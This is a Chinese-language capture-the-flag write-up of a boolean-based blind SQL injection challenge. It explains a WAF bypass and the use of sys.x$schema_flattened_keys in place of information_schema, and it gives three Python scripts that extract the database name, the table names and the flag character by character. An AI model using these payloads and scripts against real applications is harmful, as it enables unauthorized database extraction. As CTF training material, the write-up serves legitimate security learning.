id=1时提示:
Nu1L
id=2时提示:
V&N
id=0(不存在)时提示:
Error Occured When Fetch Result.
触发WAF时提示:
SQL Injection Checked.
输入if(0,1,2),因为0是false,所以等同id=2,输出V&N
输入if(1,1,2),因为1是true,所以等同id=1,输出Nu1L
判断当前数据库名长度,等于21时返回Nu1L,证明语句为真:
if((length(database()))=21,1,2)
“if(ord”这个组合拳被过滤掉了,把ord()改为ascii()就好:
import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,22):
for j in range(23,123):
payload = payload1+str(i)+payload2+str(j)+payload3
data = {'id':payload}
s = requests.post(url,data=data).text
if ("Nu1L" in s):
name += chr(j)
print(name)
break
得到库名为give_grandpa_pa_pa_pa。继续爆表名,information_schema被过滤了,查了下资料,可以用sys.x$schema_flattened_keys代替
判断表名长度,等于39时返回Nu1L,证明语句为真:
if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)
爆表:
import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,40):
for j in range(23,123):
payload = payload1+str(i)+payload2+str(j)+payload3
data = {'id':payload}
s = requests.post(url,data=data).text
if ("Nu1L" in s):
name += chr(j)
print(name)
break
得到两个表名:f1ag_1s_h3r3_hhhhh,users233333333333333
正常应该爆列名,因为information_schema被过滤懒得搞直接猜测flag在flag列里了。。稍微改了下长度,为了快点换成了小字典。
import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1,50):
for j in dic:
payload = payload1+str(i)+payload2+str(ord(j))+payload3
data = {'id':payload}
s = requests.post(url,data=data).text
if ("Nu1L" in s):
name += j
print(name)
break
